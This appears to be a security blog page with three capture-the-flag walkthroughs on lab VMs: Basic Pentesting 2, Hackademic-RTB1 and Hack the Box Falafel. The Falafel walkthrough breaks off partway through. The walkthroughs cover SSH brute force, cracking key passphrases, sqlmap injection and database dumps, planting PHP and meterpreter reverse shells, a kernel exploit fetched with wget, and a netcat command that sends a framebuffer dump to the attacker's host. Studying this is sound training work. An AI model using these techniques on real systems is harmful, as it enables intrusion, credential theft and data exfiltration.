Hacking Articles|Raj Chandel's Blog

Hack the Basic Pentesting:2 VM (CTF Challenge)

at 4:09 AM Saturday, July 14, 2018 0 comments

Basic pentesting 2 is a boot2root VM and is a continuation of the Basic Pentesting series by Josiah Pierce. This series is designed to help newcomers to penetration testing develop pentesting skills and have fun exploring part of the offensive side of security.
VirtualBox is the recommended platform for this challenge (though it should also work with VMware -- however, I haven’t tested that).
This VM is a moderate step up in difficulty from the first entry in this series. If you’ve solved the first entry and have tried a few other beginner-oriented challenges, this VM should be a good next step. Once again, this challenge contains multiple initial exploitation vectors and privilege escalation vulnerabilities.
Your goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt.

You can download it from here.

Penetrating Methodologies

§ Port scanning

§ Used enum4linux to enumerate all the users

§ SSH bruteforce for the user jan

§ Attained SSH .pub file for user kay

§ Used ssh2john to convert that pub key into crackable format

§ Used john the ripper to crack key and attained a passphrase

§ Logged into user kay using the passphrase

§ Attained the file pass.bak

§ Got root access to the lab using password in pass.bak

§ Captured the flag

Let’s start!!

So, let’s begin by first scanning the ports open by using the most popular scanning tool called nmap.

nmap –A 192.168.1.139

Here, we can see that port 22 is open. But we don’t have any users currently. Let’s use enum4linux and try to find the users available.

Here, we have found 2 users jan and kay with us.

Let’s try brute-force for the user jan using hydra tool which comes pre-installed in kali. We will be using the dictionary “rockyou.txt” to brute-force the login of jan

hydra –l jan –P /usr/share/wordlists/rockyou.txt 192.168.1.139 ssh

Amazing! We have found the login details of jan!

Username: jan

Password: armando

Now, let’s try and ssh login using the details we just cracked.

Wow! We have successfully gained a shell here. But jan don’t have sudo rights. Let’s check for any other users and the files and folders in it.

cd /home

We found another folder called kay. Let’s go inside it and run ls –la command.

cd .ssh

ls –la

Hmmm… this id_rssa file looks fishy. Let’s read it using: cat id_rsa and copy paste it in the text file.

Now, we are going to use ssh2john to convert this SSH key into a crackable file for john the ripper.

python ssh2john key > ssh_login

john ssh_login

Here, we found the phrase “beeswax.” This could either be a password or any other phrase to unlock something as we move further.

Let’s try and login to user kay using that key.

ssh –i key kay@192.168.1.139

It is asking for a passphrase now. Let’s try and enter “beeswax”

Voila!! We have successfully gained the access to kay. Now let’s try and read that pass.bak file. It looks like it could have something valuable!

cat pass.bak

It gives us a phrase “heresareallystrongpasswordthatfollowsthepasswordpolicy$$”

Now Let’s check sudo rights for him and write sudo –l

It surely asks for a root password. Let us type what we just got in pass.bak file. And you can observe kay has ALL permissions.

sudo su

Voila! It gives us a root access. Let’s check the /root directory by:

cd /root

And we got a flag !!!

Hence, we were able to attain the flag in this challenge. Happy hacking!

Hack the Hackademic-RTB1 VM (Boot to Root)

at 11:56 PM Friday, July 13, 2018 0 comments

Hello friends! Today we are going to solve a very simple and easy CTF challenge of the vulnhub. This is the first realistic hackademic challenge (root this box) by mr.pr0n. Download the target it from here and get root.

Penetrating Methodologies

Network Scanning (Nmap, netdiscover)
Wordpress (CMS) based SQLMAP Scanning
Extract databases and Wordpress user credentials
Login into the Wordpress admin console with specific user
Upload and execute a Reverse shell
Reverse connection (Metasploit)
Exploiting target (exploit 15285)
Get Root access and capture the flag.

Let’s Start!!!

Start off with finding the target using:

netdiscover

Our target is 192.168.1.104. Now scan the target with nmap :

nmap -p- -A 192.168.1.104

With the nmap scan, you can see the ports 80, 22 are open. Let’s target the port 80 first.

Now we will browse the website with http://192.168.1.104 and a page will open as shown below in the image. Now click on the word target mentioned in “Please go to your target and try to get root”

Upon clicking the target, below page will open http://192.168.1.104/Hackademic_RTB1/

Navigate by clicking on Uncategorized it will redirect to below URL http://192.168.1.104/Hackademic_RTB1/?cat=1

Now let’s try to look for SQL injection by trying with single quote (‘) and got the below error as shown in the image. With this we also came to know that this is a WORDPRESS (CMS) website and it is vulnerable to sql injection.

http://192.168.1.104/Hackademic_RTB1/?cat=1’

Now using above URL, we will enumerate the databases with SQLMAP command to get more details

sqlmap –u http://192.168.1.104/Hackademic_RTB1/?cat=1 --dbs --batch

Note : Instead of SQLMAP , we can also run wpscan (Wordpress scan) which will yield same results

Upon successful completion of the SQLMAP scan, we came to know that the following databases listed are available in the website, and “wordpress” could be desired database name.

Extract the user information from the wordpress database, using SQLMAP

sqlmap –u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress --dump-all --batch

SQLMAP will also automatically perform the password cracking of the users’ passwords

Browsed the Wordpress login page http://192.168.1.104/Hackademic_RTB1/wp-login.php and logged in with above mentioned usernames; however got success with the user GeorgeMiller as observed that it has many options available in the admin panel as compared to other users’ .It also has the privileges to add/modify the PHP script.

Upon logging into the URL with the credentials, Navigate to Manage à Files and modify the hello.php file. Replace the text with the content from the PHP reverse shell file (php-reverse-shell.php) available in the Kali Linux server at the path /usr/share/webshells/php.

Once it is copied to the hello.php file, click on Update file

Access the URL http://192.168.1.104/Hackademic_RTB1/wp-content/plugins/hello.php

Ran the Netcat listener along with browsing the website URL again, upon which we got the initial / limited shell. Here upon examining the Linux Kernel version we found that this could be vulnerable.

Searched across the internet to found the privilege escalation exploit that might apply to the kernel version 2.6.31 found (as shown in image above). The exploit that worked was the RDS privilege escalation and can also be found on Kali with searchsploit.

https://www.exploit-db.com/exploits/15285

Run the command searchsploit 15285 and copy the file (15285.c) to the Kali desktop. We will also run the default Python HTTP Server on the Kali linux .

Now navigate to the tmp directory of victim machine and run the wget command to download the file from Kali . This will download the 15285.c file, into the /tmp directory of victim machine.

cd/tmp

wget http://192.168.1.107/15285.c

Once the file is listed under /tmp directory , run the following commands

gcc 15285.c –o kernel

chmod 777 kernel

Now run the kernel command as follows, and it will start to exploit the vulnerability

./kernel

Once the execution of the kernel command stops, we will try to get into the root as follows and read the content of the directory

cd /root

As you can see, now we are into the privileged shell and can also see key.txt file, open the same to get the credentials!

Hurrahhhhhh!!!! We hit the goal.

Hack the Box Challenge: Falafel Walkthrough

at 11:25 PM 0 comments

Hello friends!! Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on victim’s machine

Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.

nmap –A 10.10.10.73

From its scanning result we found port 22 and 80 are open for ssh and http services.

So we explored target IP through the web browser and it put up a login page shown.

When I didn’t found any remarkable things then I used Dirbuster for directory brute force attack. It put so many files but /cyberlaw.txt looks more interesting so I browsed http://10.10.10.73/cyber.txt and put a message in front of me.

By reading this message I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using image upload feature. Moreover there is some hint on URL filter.

Then we try sql injection on the login form but it gave an error “Wrong Identification: admin”

Then we make more efforts for sql injection by using SQLMAP and used “Wrong identification” as string to be passed at the time of login.

sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" --dbs --batch

As result it dumps the database name “falafel” now let’s extract the whole database information.

sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables –batch

sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch

So we got users tables from inside it and it has username and password as shown.

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for 32 bit string is same as above

With help of following credential we login into admin dashboard and move to upload options.

Username: admin

Password: 240610708

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown.

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Let’s create a PHP payload for uploading into the web site. We have to use msfvenom command for generating PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw

Now copy the code from * and paste in a text file then as rajjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.php.png (240 character) also start multi handler in a new terminal.

Let me make it clear to you, here the author has applied filter for identifying 240 character file which means your file name must contain 240 characters including extension.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

Let execute it in the URL for obtaining reverse shell at metasploit.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.25

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation. Further, we open passwd file and notice two system username i.e. yossi and moshe.

Meterpreter> cat /etc/pasword

After making some more inspection we found a file connection.php from inside /var/www/html and receive database credential from inside it.

Meterpreter> cd /var/www/html

Meterpreter> ls

Meterpreter> cat /connection.php

This is mysql configuration file for mysql where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found user.txt file from inside /home/moshe

python -c "import pty;pty.spawn(‘/bin/bash’)"

ssh moshe@10.10.10.73

cd /home

cd moshe

cat user.txt

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of video group then for post exploitation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the frambuffer raw data inside /tmp directory as scree.raw

groups

cat /dev/fb0 > /tmp/screen.raw

cd /tmp

nc 10.10.14.25 5555 < screen.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension.

cat /sys/class/graphics/fb0/virtual_size